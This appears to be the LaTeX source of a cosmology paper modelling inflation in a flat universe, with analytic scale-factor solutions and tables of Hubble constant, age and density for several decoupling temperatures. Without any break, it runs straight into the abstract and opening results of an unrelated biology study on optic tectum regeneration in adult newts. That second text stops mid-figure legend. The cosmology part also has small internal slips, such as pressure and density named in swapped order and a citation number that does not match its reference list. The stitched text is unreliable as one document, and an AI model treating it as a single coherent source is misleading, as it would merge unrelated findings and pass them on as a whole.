--- abstract: | We started the evolution of a flat universe from a nonsingular state called prematter which is governed by an inflationary equation of state $P=(\gamma -1)\rho ,$ where $\gamma $ represents the initial vacuum dominance of the universe. The evolution of the universe except in the prematter era is affected neither by the initial vacuum dominance nor by the initial expansion rate of the universe. On the other hand, present properties of the universe such as Hubble constant, age and density are sensitive to the value of the temperature at the decoupling $\left( T_{m}\right) $. Over a range between $3\cdot 10^{4}$and $5\cdot 10^{4}$ $K$ for $T_{m},$ our model predicts a value between $50$ and $80$ $Km\cdot s^{-1}\cdot Mpc^{-1}$ for the present value of the Hubble constant $\left( H_{0}\right) .$ Assuming that the thermal history of the universe is independent from its geometry, above range could be considered as a transition range for the decoupling temperature $T_{m}.$ address: | [*Department of Physics, Middle East Technical University*]{}\ [*06531, Ankara, Turkey*]{} author: - 'K. Karaca[^1] , S. Ş. Bayin[^2]' date: 'March 01, 2002' title: Inflation in a Flat Universe --- \[theorem\][Acknowledgement]{} \[theorem\][Algorithm]{} \[theorem\][Axiom]{} \[theorem\][Claim]{} \[theorem\][Conclusion]{} \[theorem\][Condition]{} \[theorem\][Conjecture]{} \[theorem\][Corollary]{} \[theorem\][Criterion]{} \[theorem\][Definition]{} \[theorem\][Example]{} \[theorem\][Exercise]{} \[theorem\][Lemma]{} \[theorem\][Notation]{} \[theorem\][Problem]{} \[theorem\][Proposition]{} \[theorem\][Remark]{} \[theorem\][Solution]{} \[theorem\][Summary]{} Introduction ============ The standard model of hot big-bang cosmology exhibits difficulties stemming from the puzzling initial conditions. These difficulties are the well known singularity, flatness, horizon, causality, homogeneity and isotropy problems. During the past two decades, several models have been proposed to overcome these difficulties. One common feature in all of these works is that a new era called “inflationary era” was added into the history of the universe before the radiation era with which the standard cosmological model of the universe begins. During this new era, the universe expands enormously from a finite size. This huge expansion is called “inflation” and arises due to the unusual characteristic of the equation of state $(\ P=\left( \gamma -1\right) \rho )$ used to describe the universe in this era. Inflation mechanism was first suggested as a rescue from the horizon and flatness problems \[1\] and then extended in such a way to construct models which are free from an initial singularity. The equation of state used in the inflationary era determines how much initially the universe is close to the vacuum state and this is done by adjusting the values of $\gamma $. Therefore, the models constructed in such a way, are parametric universe models and evolution of these universes are also sensitive to the value of $% \gamma $ in the inflationary era \[2-5\]. In other words, the present properties of the universe such as the Hubble constant $\left( H\right) $ and the age $\left( t_{now}\right) $ are affected by the vacuum dominance of the early universe. Besides the form of the equation of state, initial expansion rate of the scale factor $\left( \dot{a}\right) $ also influences the present properties of the universe and is considered as a parameter of the universe model \[5\]. In the standard model, flatness problem arises from the extreme fine tuning of the initial values of the energy density $\rho $ and Hubble constant $H$, so that $\rho $ is very close to $\rho _{c}\left( \equiv 3H^{2}/8\pi \right) $ \[1\]$.$ This is necessary to produce a universe surviving $\sim 10^{10}$ years which is an age prediction compatible with the observational results. In the models of inflationary cosmology, without a fine tuning requirement, realistic universe models have been obtained. That is, flatness problem is solved in these models. The solution to this problem could be attributed to the enormous expansion of the universe during the inflationary era which lasts a period at the order of the Planck scale $\sim 10^{-44}\sec .$ This carries the geometry of the universe to the flat one while the value of $% \Omega (\rho /\rho _{c})$ is driven toward one. In this work, we construct a universe model having a flat space-time geometry with the same motivations as in the other inflationary universe models. Since the space-time geometry of this universe is already flat, there is no flatness problem in this universe. On the other hand, the universe is vacuum dominated due to the form of the equation of state used to describe the universe in the inflationary era. This would determine how long the universe would stay at the inflationary era before it enters the radiation era predicted by the standard model. In the other inflationary universe models, the present properties of the universe have been affected by the initial vacuum dominance of the early universe. In this work, we will study the effect of the initial vacuum dominance on the evolution of the universe having flat space-time geometry. This would give us an idea about the role of inflation mechanism when there is no flatness problem. This would be interesting because inflation mechanism was first suggested as a solution to the flatness problem \[1\] and the answer to the question: “What would be the response of a universe having a flat space-time geometry when it is inflated through such a mechanism?” is not exactly known. Our aim in this paper would be to answer this question in a different context. This paper is organized as follows: In the next section, we give the dynamical equations of our model and solve them analytically. In Sec. III, we give numerical results of the predictions of our model for the present properties of the universe. We present our discussions and conclusions in the final section. Dynamics of the Model ===================== Field Equations --------------- The space-time geometry of the model describing a spatially homogenous and isotropic universe is determined by a RW line element: $$ds^{2}=dt^{2}-a^{2}(t)\left[ \left. dr^{2}+r^{2}\left( d\theta ^{2}+\sin ^{2}\theta d\phi ^{2}\right) \right] \right.$$ where $(t,r,\theta ,\phi )$ are comoving coordinates, $a(t)$ is the scale factor which represents the size of the universe. For this line element, Einstein’s gravitational field equations: $$R_{\mu \nu }-% %TCIMACRO{\dfrac{1}{2}}% %BeginExpansion {\displaystyle{1 \over 2}}% %EndExpansion g_{\mu \nu }R=-8\pi T_{\mu \nu },$$ give $$2\frac{\ddot{a}}{a}+\left( \frac{\dot{a}}{a}\right) ^{2}=-8\pi P,$$ $$\left( \frac{\dot{a}}{a}\right) ^{2}=\frac{8\pi }{3}\rho ,$$ where $P$ and $\rho $ are the energy density and pressure respectively in the universe filled with a cosmological fluid well approximated by a perfect fluid and a dot denotes differentiation with respect to the  cosmic time $% t $. Eqs. (3) and (4) could be written as a single equation as $$%TCIMACRO{\dfrac{\ddot{a}}{a}}% %BeginExpansion {\displaystyle{\ddot{a} \over a}}% %EndExpansion +4\pi \left( \gamma -\frac{2}{3}\right) \rho =0,$$ where we have made use of the general form of the equation of state given as $P=\left( \gamma -1\right) \rho ,$ and $\gamma $ is assumed to be a constant parameter during each era in the history of the universe. From Eqs. (4) and (5), we could obtain an equation involving only the scale factor $a(t)$ as $$\left( %TCIMACRO{\dfrac{\ddot{a}}{a}}% %BeginExpansion {\displaystyle{\ddot{a} \over a}}% %EndExpansion \right) +\left( %TCIMACRO{\dfrac{3}{2}}% %BeginExpansion {\displaystyle{3 \over 2}}% %EndExpansion \gamma -1\right) \left( %TCIMACRO{\dfrac{\dot{a}}{a}}% %BeginExpansion {\displaystyle{\dot{a} \over a}}% %EndExpansion \right) ^{2}=0.$$ This equation could be solved for any $\gamma $ if we define conformal time $% \eta $ as $$dt=a\left( \eta \right) d\eta .$$ In conformal time $\eta ,$ Eqs. (4), (5) and (6) become $$\left( \frac{a^{\prime }}{a^{2}}\right) ^{2}=\frac{8\pi }{3}\rho ,$$ $$\frac{a^{\prime \prime }}{a^{3}}-\left( \frac{a^{\prime }}{a^{2}}\right) ^{2}+4\pi \left( \gamma -\frac{2}{3}\right) \rho =0,$$ $$\frac{a^{\prime \prime }}{a}+\left( \frac{3}{2}\gamma -2\right) \left( \frac{% a^{\prime }}{a}\right) ^{2}=0,$$ where a prime denotes differentiation with respect to the conformal time. If we make the following change of variable $$u\equiv %TCIMACRO{\dfrac{a^{\prime }}{a}}% %BeginExpansion {\displaystyle{a^{\prime } \over a}}% %EndExpansion =% %TCIMACRO{\dfrac{d\ln a}{d\eta }}% %BeginExpansion {\displaystyle{d\ln a \over d\eta }}% %EndExpansion ,$$ Eq. (10) could be brought into a much simpler form given as $$u^{\prime }+cu^{2}=0,$$ where $$c=% %TCIMACRO{\dfrac{3}{2}}% %BeginExpansion {\displaystyle{3 \over 2}}% %EndExpansion \gamma -1.$$ Eq. (12) is a kind of Riccati equation and since we will consider vacuum like state for the inflationary era $(c\neq 0),$ it could be solved by setting $$u=% %TCIMACRO{\dfrac{1}{c}}% %BeginExpansion {\displaystyle{1 \over c}}% %EndExpansion %TCIMACRO{\dfrac{w^{\prime }}{w}}% %BeginExpansion {\displaystyle{w^{\prime } \over w}}% %EndExpansion =\left[ \ln \left( w^{1/c}\right) \right] ^{\prime }.$$ This new change of variable leads us to write $$\frac{w^{\prime \prime }}{w}=0,$$ which gives the solution in the following form $$a\left( \eta \right) =a_{0}\left( \eta +b\right) ^{1/c},$$ where $a_{0}$ and $b$ are integration constants. Due to the unusual characteristic of the equation of state used in the inflationary era, the temperature of the universe rises in this era although the expansion of the universe is assumed to be adiabatic. This could be seen if one considers the following relation derived from the first law of thermodynamics: $$%TCIMACRO{\dfrac{T^{\prime }}{T}}% %BeginExpansion {\displaystyle{T^{\prime } \over T}}% %EndExpansion +3% %TCIMACRO{\dfrac{a^{\prime }}{a}}% %BeginExpansion {\displaystyle{a^{\prime } \over a}}% %EndExpansion \left( \gamma -1\right) =0$$ (corresponding to Eq. (33) in \[5\]). Our modelling of the universe lies on a thermodynamic assumption that the expansion of the universe continues until the Planck temperature $T_{pl}$ which is assumed to be the maximum allowed temperature. Then the equation of state takes the form of that of the isotropic radiation. In other words, the universe starts behaving as predicted in the standard model of the universe. Therefore, we give an outline of our toy model as a\) [**The inflationary (prematter) era** ]{}$\left( 0\leq \eta \leq \eta _{r}\right) :$ The equation of state is given as $P=\left( \gamma -1\right) \rho $ where $\gamma =\gamma _{p}\simeq 10^{-3}.$ The constitution and behavior of the material substance filling the universe in this era is not exactly known. b\) [**The radiation era** ]{}$\eta _{r}\leq \eta \leq \eta _{m}):$[** **]{}The universe is assumed to be composed of isotropic radiation for which the equation of state is known to be $P=\rho /3.$ This corresponds to $\gamma =\gamma _{r}=4/3$ in the general form of the equation of state. c\) [**The matter era** ]{}$\left( \eta _{m}\leq \eta \right) :$ The era that we live in. Due to the large intergalactic distance and small relative motions of the intergalactic objects, it would be assumed that the universe is assumed to be filled with zero pressure dust such that $P=0,$ $\gamma =\gamma _{m}=1.$ These eras are connected by first order phase transitions occurring at some specific temperatures $T_{pl}$ and $T_{m}.$ $T_{m}$ is the temperature at which radiation and matter are decoupled. There is not a generally accepted value for this temperature other than ones which are speculated \[6,7\]. Due to the lack of information, we will not assign a numerical value to $T_{m}$ until we find expressions about the present properties of the universe. Boundary conditions and solutions for the scale factor ------------------------------------------------------ To eliminate the initial singularity in our model, we start the evolution of the universe from a limiting density called the Planck density $\left( \rho _{pl}\right) $ corresponding to finite size for the scale factor of the universe. To solve for the dynamics of the universe, we then specify the initial expansion rate of the universe as $$a^{\prime }\left( 0\right) =v,$$ where $v$ is a positive constant. Writing Eq. (8) at $\eta =0,$ we get $$a(0)=\sqrt{\frac{v}{\sqrt{d}}},$$ which reflects the singularity-free character of our cosmological model. The solutions for the scale factor in different eras are  $$a(\eta )=\left\{ \begin{array}{ll} a_{0}^{(p)}(\eta +b_{p})^{1/c_{p}}\ & \ \ 0\leq \eta \leq \eta _{r}, \\ a_{0}^{(r)}(\eta +b_{r})] & \eta _{r}\leq \eta \leq \eta _{m}, \\ a_{0}^{(m)}(\eta +b_{m})^{2}\ & \ \eta _{m}\leq \eta . \end{array} \right.$$ We next impose that the scale factor and its derivative are continuous at points $(\eta _{r},\eta _{m})$ where the phase transitions take place. This leads us to determine the integration constants: $$a_{0}^{(p)}=% %TCIMACRO{\dfrac{\sqrt{\dfrac{v}{H(0)}}}{b_{p}^{\frac{1}{c_{p}}}}}% %BeginExpansion {\displaystyle{\sqrt{% {\displaystyle{v \over H(0)}}} \over b_{p}^{\frac{1}{c_{p}}}}}% %EndExpansion ,$$ $$b_{p}=\frac{1}{c_{p}\sqrt{vH(0)}},$$ $$a_{0}^{(r)}=\frac{a_{0}^{(p)}}{c_{p}}(\eta _{r}+b_{p})^{\frac{1}{c_{p}}-1},$$ $$b_{r}=c_{p}b_{p}+(c_{p}-1)\eta _{r},$$ $$a_{0}^{\left( m\right) }=\frac{a_{0}^{(r)}}{4(\eta _{m}+b_{r})},$$ $$b_{m}=\eta _{m}+2b_{r,}$$ where $H(0)$ is the initial value of the Hubble constant which is given as $$H(0)=% %TCIMACRO{\dfrac{a^{\prime }(0)}{a^{2}(0)}}% %BeginExpansion {\displaystyle{a^{\prime }(0) \over a^{2}(0)}}% %EndExpansion =\sqrt{d},$$ Physical properties of the model -------------------------------- During the radiation era, the universe is assumed to consist of pure radiation which is in thermal equilibrium. Therefore, its energy density could be expressed in the blackbody form which is given as $$\rho _{blackbody}=% %TCIMACRO{\dfrac{8\pi ^{5}(kT_{pl})^{4}}{15}}% %BeginExpansion {\displaystyle{8\pi ^{5}(kT_{pl})^{4} \over 15}}% %EndExpansion ,$$ where $k=1.38\cdot 10^{-16}K^{-1}$ is the Boltzmann constant. As mentioned before, the universe heats up while expanding during the inflationary era. We end the inflationary era with a thermodynamical constraint which is the attainment of the Planck temperature $T_{pl}.$ Knowing that the scale factor of the universe evolves with the energy density according to the Einstein’s equations, we consider Eq. (8) together with Eqs. (20), (21), (27) and (28), and end up with $$\eta _{r}=b_{p}\left[ \left( 1.5201\right) ^{\frac{c_{p}}{2\left( c_{p}+1\right) }}-1\right] ,$$ which is the conformal time corresponding to the phase transition between the inflationary and radiation eras. With the help of the Eq. (17), we could match the evolution of the scale factor to that of the temperature. To this end, we have to specify $\gamma $ for each era. It is already mentioned that $\gamma $ equals $4/3$ for the radiation era. Then we write $$%TCIMACRO{\dfrac{a(\eta _{r})}{a(\eta _{m)}}}% %BeginExpansion {\displaystyle{a(\eta _{r}) \over a(\eta _{m)}}}% %EndExpansion =% %TCIMACRO{\dfrac{T_{m}}{T_{pl}}}% %BeginExpansion {\displaystyle{T_{m} \over T_{pl}}}% %EndExpansion ,$$ which, when combined with Eq. (24) gives $$\eta _{m}=c_{p}b_{p}\left( 1.5201\right) ^{\frac{c_{p}}{2\left( c_{p}+1\right) }}\frac{T_{pl}}{T_{m}}-b_{r}$$ which is the conformal time associated to the phase transition between radiation and matter eras. Before the emergence of matter as the dominant constituent of the energy density in the universe, radiation decouples from matter and basic constituents of matter (electrons, protons, neutrons etc.) start to form. Then they combine for the first time in a process called “recombination” to form the more complex form of matter in the universe. At this point, it is to be noted that after the decoupling between radiation and matter eras, radiation still behaves as a perfect fluid responsible for the temperature of the universe. As Kolb and Turner \[6\], we will consider decoupling as the beginning of the matter era. With these in mind, we get from Eq. (17) $$%TCIMACRO{\dfrac{a\left( \eta _{m}\right) }{a\left( \eta _{now}\right) }}% %BeginExpansion {\displaystyle{a\left( \eta _{m}\right) \over a\left( \eta _{now}\right) }}% %EndExpansion =% %TCIMACRO{\dfrac{T_{now}}{T_{m}}}% %BeginExpansion {\displaystyle{T_{now} \over T_{m}}}% %EndExpansion ,$$ where we have chosen integration limits to be the conformal times corresponding to the second phase transition and the present time. This equation could be solved for $\eta _{now}$ as $$\eta _{now}=\sqrt{\frac{T_{m}}{T_{now}}}\eta _{m}+\left( \sqrt{\frac{T_{m}}{% T_{now}}}-1\right) b_{m}$$ In order to find comoving times corresponding to conformal times, we first consider the definition given by Eq.(7) and assume that $t=0$ at $\eta =0$. Then we get from Eq. (16) $$t\left( \eta \right) =a_{0}\int_{0}^{\eta }\left( \eta ^{\prime }+b\right) ^{1/c}d\eta ^{\prime }.$$ Since $c$ takes different values for each era in the history of the universe, this integral has to be computed separately for each era. For the inflationary $\left( c=c_{p}\right) ,$ radiation $\left( c_{r}=1\right) $ and matter $\left( c_{m}=1/2\right) $ eras, Eq. (34) can be integrated to yield analytical expressions as $$t_{r}=\frac{\sqrt{1.5201}-1}{\left( c_{p}+1\right) \sqrt{d}},$$ $$t_{m}=t_{r}+\frac{\sqrt{1.5201}}{2\sqrt{d}}\left[ \left( \frac{T_{pl}}{T_{m}}% \right) ^{2}-1\right] ,$$ $$t_{now}=t_{m}+\frac{2}{3}\sqrt{\frac{1.5201}{d}}\left( \frac{T_{pl}}{T_{m}}% \right) ^{2}\left[ \left( \frac{T_{m}}{T_{now}}\right) ^{3/2}-1\right] .$$ We make use of the definition given as $$H\left( \eta \right) \equiv \frac{a^{\prime }\left( \eta \right) }{% a^{2}\left( \eta \right) },$$ to find the Hubble constant at $\eta _{r},\eta _{m}$ and $\eta _{now}.$ They are $$H\left( \eta _{r}\right) =% %TCIMACRO{ %\dfrac{a^{\prime }\left( \eta _{r}\right) }{a^{2}\left( \eta _{r}\right) }}% %BeginExpansion {\displaystyle{a^{\prime }\left( \eta _{r}\right) \over a^{2}\left( \eta _{r}\right) }}% %EndExpansion =1.3436\cdot 10^{63}\ Km\cdot s^{-1}\cdot Mpc^{-1},$$ $$H\left( \eta _{m}\right) =% %TCIMACRO{ %\dfrac{a^{\prime }\left( \eta _{m}\right) }{a^{2}\left( \eta _{m}\right) }}% %BeginExpansion {\displaystyle{a^{\prime }\left( \eta _{m}\right) \over a^{2}\left( \eta _{m}\right) }}% %EndExpansion =6.6925\cdot 10^{-2}\cdot T_{m}^{2}\text{ }Km\cdot s^{-1}\cdot Mpc^{-1},$$ $$H\left( \eta _{now}\right) =% %TCIMACRO{ %\dfrac{a^{\prime }\left( \eta _{now}\right) }{a^{2}\left( \eta _{now}\right) }}% %BeginExpansion {\displaystyle{a^{\prime }\left( \eta _{now}\right) \over a^{2}\left( \eta _{now}\right) }}% %EndExpansion =0.2969\cdot \sqrt{T_{m}}\text{ }Km\cdot s^{-1}\cdot Mpc^{-1}.$$ The energy density evolves with the scale factor of the universe as described by Eq. (4) which when combined with Eq. (5) gives $$\dot{\rho}+3\gamma %TCIMACRO{\dfrac{\dot{a}}{a}}% %BeginExpansion {\displaystyle{\dot{a} \over a}}% %EndExpansion \rho =0.$$ In terms of conformal time $\eta ,$ this equation becomes $$\rho ^{\prime }+3\gamma %TCIMACRO{\dfrac{a^{\prime }}{a}}% %BeginExpansion {\displaystyle{a^{\prime } \over a}}% %EndExpansion \rho =0,$$ which could be solved as $$%TCIMACRO{ %\dfrac{\rho \left( \eta _{f}\right) }{\rho \left( \eta _{i}\right) }}% %BeginExpansion {\displaystyle{\rho \left( \eta _{f}\right) \over \rho \left( \eta _{i}\right) }}% %EndExpansion =\left( %TCIMACRO{\dfrac{a\left( \eta _{i}\right) }{a\left( \eta _{f}\right) }}% %BeginExpansion {\displaystyle{a\left( \eta _{i}\right) \over a\left( \eta _{f}\right) }}% %EndExpansion \right) ^{3\gamma },$$ where $\eta _{i}$ and $\eta _{f}$ mark the initial and final instants respectively of any conformal time interval in a given era. When $\eta _{i}$ and $\eta _{f}$  are chosen as$\ \left( \eta _{i,}\eta _{f}\right) =\left( 0,\eta _{r}\right) ,\left( \eta _{r},\eta _{m}\right) ,\left( \eta _{m},\eta _{now}\right) $ we obtain,respectively $$\rho \left( \eta _{r}\right) =3.3923\cdot 10^{93}gr\cdot cm^{-3},$$ $$\rho \left( \eta _{m}\right) =8.4166\cdot 10^{-36}\cdot T_{m}^{4}\text{ }% gr\cdot cm^{-3},$$ $$\rho \left( \eta _{now}\right) =1.6566\cdot 10^{-34}\cdot T_{m}\text{ }% gr\cdot cm^{-3}.$$ Numerical Results ----------------- The results that we have found for the physical properties of the universe during its evolution clearly indicates that our model is sensitive to the temperature at the last phase transition $\left( T_{m}\right) .$ On the other hand, except the lifetime of the inflationary era, the time periods are insensitive to the choice of parameter $\gamma _{p}.$ Since we do not have enough information about what the value of $T_{m}$ should be, we will try to assign some numerical results in the light of the recent observational results for the present properties of the universe such as Hubble constant, age and density. While doing this, as mentioned previously, we keep in mind that $\gamma _{p}$ is no longer a parameter which affects the evolution of the universe. Therefore, $T_{m}$ could be regarded as the only parameter of our model. Recent observations suggest a value approximately between $9$ and $15$ $Gyr$ for the present age of the universe $\left( t_{now}\right) $ \[8,9\] and a value in the range of $\sim $ $50-80$ $Km\cdot s^{-1}\cdot Mpc^{-1}$ for the present value of the Hubble constant $(H_{0})$ \[10-16\]. In our model, $T_{m}$ should take a value falling roughly into the range of $3\cdot 10^{4}-5\cdot 10^{4}$ $K$ so that the predictions of the model for $H_{0}$ and $t_{now}$ agree with observations. Since $\gamma _{p}$ has no effect on the evolution of the universe, we fix it to $1.9000\cdot 10^{-3}$ and we present the results about the present properties of the universe and those at the end of each era for $T_{m}=3\cdot 10^{4}$ $K,$ $3.5\cdot 10^{4}$ $K,$ $4\cdot 10^{4} $ $K,$ $4.5\cdot 10^{4}$ $K,$ $5.0\cdot 10^{4}$ $K$ in tables 1-5. Discussion ---------- In this work, we try to explore the connection between flatness problem and inflation mechanism. We do this by constructing a flat universe model by adding a new era called inflationary era into the history of the universe. In our model, the universe starts its journey with a vacuum like state and undergoes a first order phase transition into the radiation era which is predicted by the standard model as the era with which the universe first starts to expand. It is an already known fact that inflation mechanism carries different types of space-time geometries (closed, open) to flat one by causing a huge expansion in a time period at the order of Planck-Scale. Unlike other models in which initial vacuum like structure of the universe affected the present properties of the universe, in this model the radiation and matter eras are not affected by the vacuum dominance of the early universe. The vacuum dominance of the early universe is important when the universe is in the inflationary era. If the universe starts with a pure vacuum state $(\gamma =0)$, it cannot exit from inflation. This could be seen from the singular behavior of $t_{r}$ for $\gamma =0.$ As the initial state of the universe approaches the vacuum state, the time spent by the universe in the inflationary era increases. After the universe exits from inflation, it behaves as predicted in the standard model in which there is no initial vacuum dominance. The present properties of the universe such as Hubble constant, age and density are not affected by the initial vacuum dominance. Instead, they are highly sensitive to the temperature at the last phase transition $\left( T_{m}\right) .$ In that case, this temperature can be considered as a parameter. Therefore, the model we construct is a one-parameter universe model. Considering the fact that the thermal history of the universe is independent of the geometry of the universe, we may argue that the range considered for $T_{m}$ could be seen as a transition range for the decoupling temperature. [**References**]{} \[1\] A. H. Guth, Phys. Rev. D, [**23**]{}, 347 (1981). \[2\] M. Israelit, N.Rosen, Astrophys. J. [**342**]{}, 627 (1989) (IR). \[3\] S.P. Starkovich, F. I. Cooperstock, Astrophys. J. [**398**]{}, 1 (1992)      (SC). \[4\] S. S. Bayin, F. I. Cooperstock, V. Faraoni, Astrophys. J. [**428**]{}, 439 (1994)      (BCF). \[5\] K. Karaca, S. Ş. Bayin (astro-ph/0007019). \[6\] S. Weinberg, [*Gravitation and Cosmology* ]{}(Wiley, New York, 1972). \[7\] E. Kolb, M. Turner, [*The Early Universe*]{} (Addison-Wesley, New York,      1990). \[8\] B. Chaboyer et al., Astrophys. J. [**494,** ]{}96 (1998). \[9\] I. N. Reid, astro-ph/9704078. \[10\] J. R. Mould et al., Astrophys. J. [**529,** ]{}768 (2000). \[11\] D. D. Kelson et al., Astrophys. J. [**529,** ]{}768 (2000). \[12\] L. Ferrarese et al., Astrophys. J. [**529,** ]{}745 (2000). \[13\] B. K. Gibson et al., Astrophys. J. [**529,** ]{}723 (2000). \[14\] S. Sakai et al., Astrophys. J. [**529,** ]{}698 (2000). \[15\] A. Saha et al., Astrophys. J. [**522**]{}, 802 (1999). \[16\] R. Giovanelli et al., Astrophys. J. Lett. [**477,** ]{}L1 (1997). $\bigskip $ $$TABLE\text{ }1$$ $$RESULTS\text{ }FOR\text{ }T_{m}=3\cdot 10^{4}K$$ $$\begin{tabular}{|l|l|l|} \hline\hline $H(\frac{km}{s\cdot mpc})$ & $t(yr)$ & $\rho (\frac{gr}{cm^{3}})$ \\ \hline\hline 1.3436$\cdot 10^{63}$ & 4.8238$\cdot 10^{-50}$ & 3.3923$\cdot 10^{93}$ \\ \hline\hline 6.0233$\cdot 10^{7}$ & 8.1164$\cdot 10^{3}$ & 6.8174$\cdot 10^{-18}$ \\ \hline\hline 51.4246 & 1.2675$\cdot 10^{10}$ & 4.9698$\cdot 10^{-30}$ \\ \hline \end{tabular}$$ $$TABLE\text{ }2$$ $$RESULTS\text{ }FOR\text{ }T_{m}=3.5\cdot 10^{4}K$$ $$\begin{tabular}{|l|l|l|} \hline\hline $H(\frac{km}{s\cdot mpc})$ & $t(yr)$ & $\rho (\frac{gr}{cm^{3}})$ \\ \hline\hline 1.3436$\cdot 10^{63}$ & 4.8238$\cdot 10^{-50}$ & 3.3923$\cdot 10^{93}$ \\ \hline\hline 8.1983$\cdot 10^{7}$ & 5.9631$\cdot 10^{3}$ & 1.2630$\cdot 10^{-17}$ \\ \hline\hline 55.5449 & 1.1735$\cdot 10^{10}$ & 5.7981$\cdot 10^{-30}$ \\ \hline \end{tabular}$$ $$TABLE\text{ }3$$ $$RESULTS\text{ }FOR\text{ }T_{m}=4\cdot 10^{4}K$$ $$\begin{tabular}{|l|l|l|} \hline\hline $H(\frac{km}{s\cdot mpc})$ & $t(yr)$ & $\rho (\frac{gr}{cm^{3}})$ \\ \hline\hline 1.3436$\cdot 10^{63}$ & 4.8238$\cdot 10^{-50}$ & 3.3923$\cdot 10^{93}$ \\ \hline\hline 1.0708$\cdot 10^{8}$ & 4.5655$\cdot 10^{3}$ & 2.1546$\cdot 10^{-17}$ \\ \hline\hline 59.3800 & 1.0977$\cdot 10^{10}$ & 6.6264$\cdot 10^{-30}$ \\ \hline \end{tabular}$$ $$TABLE\text{ }4$$ $$RESULTS\text{ }FOR\text{ }T_{m}=4.5\cdot 10^{4}K$$ $$\begin{tabular}{|l|l|l|} \hline\hline $H(\frac{km}{s\cdot mpc})$ & $t(yr)$ & $\rho (\frac{gr}{cm^{3}})$ \\ \hline\hline 1.3436$\cdot 10^{63}$ & 4.8238$\cdot 10^{-50}$ & 3.3923$\cdot 10^{93}$ \\ \hline\hline 1.3552$\cdot 10^{8}$ & 3.6073$\cdot 10^{3}$ & 3.4513$\cdot 10^{-17}$ \\ \hline\hline 62.9820 & 1.0349$\cdot 10^{10}$ & 7.4547$\cdot 10^{-30}$ \\ \hline \end{tabular}$$ $$TABLE\text{ }5$$ $$RESULTS\text{ }FOR\text{ }T_{m}=5\cdot 10^{4}K$$ $$\begin{tabular}{|l|l|l|} \hline\hline $H(\frac{km}{s\cdot mpc})$ & $t(yr)$ & $\rho (\frac{gr}{cm^{3}})$ \\ \hline\hline 1.3436$\cdot 10^{63}$ & 4.8238$\cdot 10^{-50}$ & 3.3923$\cdot 10^{93}$ \\ \hline\hline 1.6731$\cdot 10^{8}$ & 2.9219$\cdot 10^{3}$ & 5.2604$\cdot 10^{-17}$ \\ \hline\hline 66.3889 & 9.8178$\cdot 10^{9}$ & 8.2830$\cdot 10^{-30}$ \\ \hline \end{tabular}$$ [^1]: karacak@metu.edu.tr [^2]: bayin@newton.physics.metu.edu.tr
ABSTRACT Adult newts can regenerate large parts of their brain from adult neural stem cells (NSCs), but how adult NSCs reorganize brain structures during regeneration remains unclear. In development, elaborate brain structures are produced under broadly coordinated regulations of embryonic NSCs in the neural tube, whereas brain regeneration entails exquisite control of the re-establishment of certain brain parts, suggesting that a yet-unknown mechanism directs NSCs upon partial brain excision. Here we report that upon excision of a quarter of the adult newt (Pleurodeles waltl) mesencephalon, active participation of local NSCs around specific brain subregions’ boundaries leads to some imperfect and some perfect brain regeneration along an individual's rostrocaudal axis. Regeneration phenotypes depend on how wound closing occurs using local NSCs, and perfect regeneration replicates development-like processes, but takes more than 1 year. Our findings indicate that newt brain regeneration is supported by modularity of boundary-domain NSCs with self-organizing ability in neighboring fields. During development, the identities of brain subregions become progressively defined according to embryonic neuroepithelial NSCs’ expression of sets of transcription factors (TFs), including homeobox genes or nuclear receptor genes, the expression level and timing of which are governed by morphogens secreted from secondary organizing centers in the brain, such as the isthmus (the mesencephalic-metencephalic boundary) and the floor and the roof plate (the right and left boundaries of the mesencephalic lobes) (Armentano et al., 2007; O'Leary et al., 2007; Vieira et al., 2010; Wurst and Bally-Cuif, 2001). Embryonic neuroepithelial NSCs transmit positional information (i.e. region-specific expression of TFs) radially to their progenies (Guillemot, 2007) and this system is accordingly a robust self-organizing system for maintaining the regional identity of each brain subregion, suggesting the possibility that brain regeneration in adult animals may also be subject to restraints of regional identity established in the developmental stage. Like embryonic NSCs, adult ependymoglia cells and neurons in animals with regenerative ability show region-specific expression of several TFs, and their expression patterns are very similar to those in vertebrate embryos; for example, Pax7 expression in the dorsal mesencephalon (the optic tectum, OT) (Joven et al., 2013a,b; Schnapp et al., 2005). However, it remains largely unknown whether original brain structures can be regenerated if the brain loses an entire subregion containing a distinctive population of ependymoglia cells and thereby completely loses the specific positional information there (defined here as ‘large-scale brain injury’). It is speculated that in order to reconstruct the entire excised brain subregion, adult NSCs might show novel solutions for regaining the regional identity of the brain subregion rather than simply acting to increase the tissue volume by adding neuronal cells from corresponding domains of the pre-existing ependymal layer, by analogy to the properties of NSCs that have been reported in regeneration after a longitudinal incision in the zebrafish spinal cord (Kuscha et al., 2012). Thus, the establishment of a large-scale brain regeneration model in regenerative animals holds promise of providing insights into how adult NSCs rebuild highly regionalized brain structures from scratch. Here, we used a unilateral OT excision method (modified from Minelli et al., 1987; Okamoto et al., 2007) in adult newts (Pleurodeles waltl) to characterize spatio-temporal dynamics of adult NSCs during large-scale brain regeneration. Using long-term observations over a period of 1 year, we unexpectedly found rostrocaudal differences in the regenerated cytoarchitecture of the OT, and this finding provides clues about how adult NSCs produce both perfect and imperfect brain structures in regeneration. This study further reveals certain similarities, and also certain differences, between development and regeneration; in contrast to development, which proceeds in successive steps from the neuroepithelium (Götz and Huttner, 2005; Smith and Schoenwolf, 1997), brain regeneration occurs under the constraint of ways of closing the wound by the local population of NSCs around boundary-domains of the mesencephalon. RESULTS The OT is the bilateral dorsal subregion of the mesencephalon that acts as a visual center in non-mammalian vertebrate brains (Roth et al., 1990). To clarify whether regeneration occurs after excision of a whole unilateral OT, we performed surgery to excise approximately a quarter of the mesencephalon of a newt, P. waltl (Fig. 1A,B). P.waltl is a urodele amphibian that can easily be raised and handled in the laboratory, and that shows remarkable capacities to regenerate various organs (Hayashi et al., 2013, 2014). All experimental newts survived the surgery (n=71/71), and none showed any apparent abnormal behavior in walking, swimming or feeding. Within 3 months after surgery, the tubular structure was regenerated by injured brains (Fig. 1B, right). Rostrocaudal differences in wound closure and laminar structure regeneration after unilateral OT excision. (A) Left: schematic representation of the unilateral OT excision after opening a window in the skull. Right: dorsal view of the open window for surgery in living animals. (B) Lateral views of the lesioned newt brain at 0 dpl and at 14 wpl. Three different rostrocaudal levels represented in C–F are depicted. (C) Left: coronal section stained with HE showing the characteristic laminar structure in the OT of the intact mesencephalon, unlike in the Teg (n=4). Right: high magnification images of boxed regions in the left panel. (D) Timeline of unilateral OT regeneration at different rostrocaudal levels. Images were obtained from serial coronal sections at 0 dpl (n=4), 2–4 wpl (n=9), 6–30 wpl (n=8) and 87 wpl (n=3). Dotted lines indicate the dissected surfaces. 